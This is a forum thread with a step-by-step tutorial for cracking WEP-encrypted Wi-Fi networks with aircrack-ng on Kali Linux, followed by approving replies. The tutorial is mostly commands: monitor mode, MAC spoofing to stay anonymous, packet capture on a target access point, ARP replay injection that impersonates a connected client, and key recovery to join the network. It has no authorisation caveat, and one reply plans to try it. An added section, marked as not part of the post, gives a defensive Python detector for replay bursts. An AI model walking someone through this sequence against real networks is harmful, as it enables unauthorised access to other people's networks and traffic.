[Kali Linux] Wifi Hacking Tutorial (WEP Networks)
#1
WEP Wifi Hacking Tutorial


WEP stands for Wired Equivalent Privacy, and this form of encryption is relatively weak, so it can be cracked with some speed. It has been replaced in modern networks by WPA and WPA2 encryption, which I will cover in subsequent tutorials, but WEP is still surprisingly common, so it is a worthy subject for the beginning tutorial in my series.

Cracking a WEP encryption basically works on the principle of capturing packets of data sent on the network, and using them to decode the encryption key.



We will be using Aircrack-NG in Kali Linux to crack the encryption in this tutorial, which is my favorite program for cracking wireless networks.
Note: You will need a wireless adapter that can support packet injection.




1) Find your wireless adapter's name

This is simple: just open a terminal and use this command to find your wireless adapter's identifier:

Code:
airmon-ng


For example, the adapter name might be wlan0 or wlan1. You can check this by typing:

Code:
ifconfig


2) Open Aircrack-Ng in Kali

This step is self-explanatory. Then, put the wireless adapter into monitor mode or promiscuous mode by using this command:

Code:
airmon-ng start wlan0

Of course, use the name of your wireless adapter in place of wlan0. airmon-ng will now name the monitor-mode wireless adapter wlan0mon.

IF YOU WANT TO REMAIN ANONYMOUS, THEN SPOOF YOUR MAC, run these commands:

Code:
ifconfig wlan0mon down
macchanger -m 99:88:77:66:55:44 wlan0mon
ifconfig wlan0mon up

This will change the MAC address of your wireless adapter; you can run it again for wlan0mon.

3) Start Capturing Traffic

We now need to start capturing "traffic" - wireless data being sent. We do this by using the airodump-ng command with the monitoring interface, wlan0mon, to capture and show us data about networks the interface can detect:


Code:
airodump-ng wlan0mon

You should see a list of Access Points appear after a small wait. Make sure the network you are targeting is using WEP encryption for this tutorial. 


4) Capture traffic to/from the target AP

Use the following command to begin capturing data from the network you are targeting:


Code:
airodump-ng --bssid 00:11:22:33:44:55 -c 11 -w example wlan0mon

Replace 00:11:22:33:44:55 with the bssid of the network you are targeting, and the 11 with the channel of the target network. "example" is the name of the file you want to store the captured packets in. They are stored in pcap format. The channel and bssid are obtained from the list of networks you got in step 3.



5) Capture enough packets to crack the encryption!


We could just wait until we capture enough data, but there is a faster way: we will need to inject packets into the AP. We can do this by imitating or "spoofing" a legitimate user connected to the network, using their MAC address. Just wait until someone connects.



6) Inject ARP Traffic

Next, we can use the aireplay-ng command to spoof their MAC address and inject packets. We just need the bssid of the AP and the MAC address of the client who connected to the AP. All we need to do is capture an "ARP" (Address Resolution Protocol) packet and then replay that ARP thousands of times in order to generate the "initialization vectors" that we need to crack WEP! Run this command in a new terminal window:


Code:
aireplay-ng -3 -b 00:11:22:33:44:55 -h 99:88:77:66:55:44 wlan0mon

Where 00:11:22:33:44:55 is the bssid again, and 99:88:77:66:55:44 is the client's MAC address. After this command is run, the airodump-ng running in the other terminal will capture enough packets to crack the WEP.



7) Crack the Password


When we have captured several thousand packets, we can crack the password in the "example" file, by using the aircrack-ng command like this:

Code:
aircrack-ng example-01.cap


If we have enough IVs, aircrack-ng will crack the key and display it on the screen, usually in hexadecimal format. You can now log in to the wireless using that key, and you are connected!

Thanks for reading, please reply with your thanks if you enjoyed this and/or found it useful.

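A defender's view of step 6, as an added example that is not part of the original post: ARP replay appears on the air as one source MAC sending a very high rate of identical-length frames to the BSSID, which a wireless IDS can flag. The frame records, the 68-byte length and the thresholds are constructed assumptions; the two tutorial MAC addresses are the placeholders from the post's commands.

```python
from collections import Counter, defaultdict

AP = "00:11:22:33:44:55"        # placeholder BSSID from the tutorial
CLIENT = "99:88:77:66:55:44"    # placeholder client MAC from the tutorial
OTHER = "aa:bb:cc:dd:ee:01"     # constructed second station

def build_sample():
    """Constructed frame records: (time_ms, source MAC, BSSID, length in bytes)."""
    frames = []
    # Ordinary station: mixed frame sizes at a low rate.
    for i, size in enumerate([120, 1500, 68, 340, 90, 1500, 210, 64]):
        frames.append((i * 500, OTHER, AP, size))
    # Replay burst: one source repeats a same-length frame every 2 ms for 3 s.
    for i in range(1500):
        frames.append((1000 + i * 2, CLIENT, AP, 68))
    return frames

def detect_replay(frames, window_ms=1000, min_frames=200, min_share=0.9):
    """Flag (source, BSSID, window) buckets dominated by one repeated length.

    Thresholds are illustrative assumptions and need tuning per network.
    """
    buckets = defaultdict(Counter)
    for ts, src, bssid, length in frames:
        buckets[(src, bssid, ts // window_ms)][length] += 1
    alerts = []
    for (src, bssid, win), lengths in sorted(buckets.items()):
        total = sum(lengths.values())
        length, count = lengths.most_common(1)[0]
        if total >= min_frames and count / total >= min_share:
            alerts.append({"src": src, "bssid": bssid,
                           "window_start_ms": win * window_ms,
                           "frames": total, "repeated_length": length})
    return alerts

if __name__ == "__main__":
    for alert in detect_replay(build_sample()):
        print(alert)
```

Because the injected frames carry a legitimate client's MAC address, an alert identifies the affected BSSID and time window rather than the sender; the durable fix is moving the network off WEP to WPA2 or later.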
#2
This is very interesting @AFG

Nice share bud, keep it flowing Tongue
#3
(10-07-2016, 04:47 AM)runescape Wrote: This is very interesting @AFG

Nice share bud, keep it flowing Tongue

Thanks buddy Smile

#4
Woah man, awesome guide! Definitely going to have to try this. Heart

#5
(10-07-2016, 06:21 PM)Red Wrote: Woah man, awesome guide! Definitely going to have to try this. Heart

Thanks my friend Smile

#6
(10-07-2016, 06:22 PM)AFG Wrote:
(10-07-2016, 06:21 PM)Red Wrote: Woah man, awesome guide! Definitely going to have to try this. Heart

Thanks my friend Smile

Anytime buddy. P.S. What's your Skype? I'll add you to the DF Chat.

#7
(10-07-2016, 06:26 PM)Red Wrote:
(10-07-2016, 06:22 PM)AFG Wrote:
(10-07-2016, 06:21 PM)Red Wrote: Woah man, awesome guide! Definitely going to have to try this. Heart

Thanks my friend Smile

Anytime buddy. P.S. What's your Skype? I'll add you to the DF Chat.

PMed you. Smile

#8
(10-07-2016, 06:28 PM)AFG Wrote:
(10-07-2016, 06:26 PM)Red Wrote:
(10-07-2016, 06:22 PM)AFG Wrote:
(10-07-2016, 06:21 PM)Red Wrote: Woah man, awesome guide! Definitely going to have to try this. Heart

Thanks my friend Smile

Anytime buddy. P.S. What's your Skype? I'll add you to the DF Chat.

PMed you. Smile

I gotchu. Heart
